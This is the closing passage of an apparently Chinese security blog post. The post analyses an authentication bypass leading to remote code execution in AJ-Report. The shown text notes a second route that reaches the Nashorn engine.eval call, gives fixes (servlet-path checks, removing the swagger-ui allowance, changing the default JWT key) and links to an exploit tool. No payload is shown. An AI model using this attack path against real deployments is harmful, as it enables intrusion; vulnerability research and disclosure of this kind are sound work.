<h5 id="别的路由"><a href="#别的路由" class="headerlink" title="别的路由"></a>别的路由</h5><p>其实<code>/dataSet/testTransform</code>路由也会调用到<code>engine.eval</code>，但是没有回显。有兴趣的师傅可以看一下，这个接口的逻辑是执行完表达式发起一个<code>http</code>请求，返回的是<code>http</code>的<code>response</code>。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240510134204870.png" alt="image-20240510134204870"></p>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h4><p>主要问题在鉴权而不是 <code>engine.eval</code> ， 应该使用 <code>reqeust.getServletPath()</code> 获取 <code>URI</code>，或者干脆把 <code>swagger-ui</code> 放行逻辑那里删掉。</p>
<p>其次需要修改<code>jwt</code>默认密钥。</p>
<h4 id="利用工具"><a href="#利用工具" class="headerlink" title="利用工具"></a>利用工具</h4><p><a target="_blank" rel="noopener" href="https://github.com/yuebusao/AJ-REPORT-EXPLOIT">https://github.com/yuebusao/AJ-REPORT-EXPLOIT</a></p>
</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://www.squirt1e.top">Squirt1e</a></p><p> <span>Link:  </span><a href="http://www.squirt1e.top/2024/05/10/aj-report-yuan-cheng-ming-ling-zhi-xing-rao-guo/">http://www.squirt1e.top/2024/05/10/aj-report-yuan-cheng-ming-ling-zhi-xing-rao-guo/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2024/05/29/ldap-ti-jie/" title="从ezldap看受限的高版本jdk环境下jndi攻击之ldap利用思路"><span>< PreviousPost</span><br><span class="prevTitle">从ezldap看受限的高版本jdk环境下jndi攻击之ldap利用思路</span></a><a class="nextSlogan" href="/2024/04/28/d3ctf2024/" title="D3CTF 2024 WEB"><span>NextPost ></span><br><span class="nextTitle">D3CTF 2024 WEB</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#TL-DR"><span class="toc-number">1.</span> <span class="toc-text">TL;DR</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%89%B4%E6%9D%83%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.</span> <span class="toc-text">鉴权绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%A6%E4%B8%80%E5%A4%84%E9%89%B4%E6%9D%83%E7%BB%95%E8%BF%87%EF%BC%88%E9%BB%98%E8%AE%A4key%EF%BC%89"><span class="toc-number">2.2.</span> <span class="toc-text">另一处鉴权绕过（默认key）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#nashorn%E5%BC%95%E6%93%8E%E6%89%A7%E8%A1%8C%E8%A1%A8%E8%BE%BE%E5%BC%8F%E7%BB%95%E8%BF%87"><span class="toc-number">2.3.</span> <span class="toc-text">nashorn引擎执行表达式绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%AB%E7%9A%84%E8%B7%AF%E7%94%B1"><span class="toc-number">2.4.</span> <span class="toc-text">别的路由</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D"><span class="toc-number">3.</span> <span class="toc-text">修复</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="toc-number">4.</span> <span class="toc-text">利用工具</span></a></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>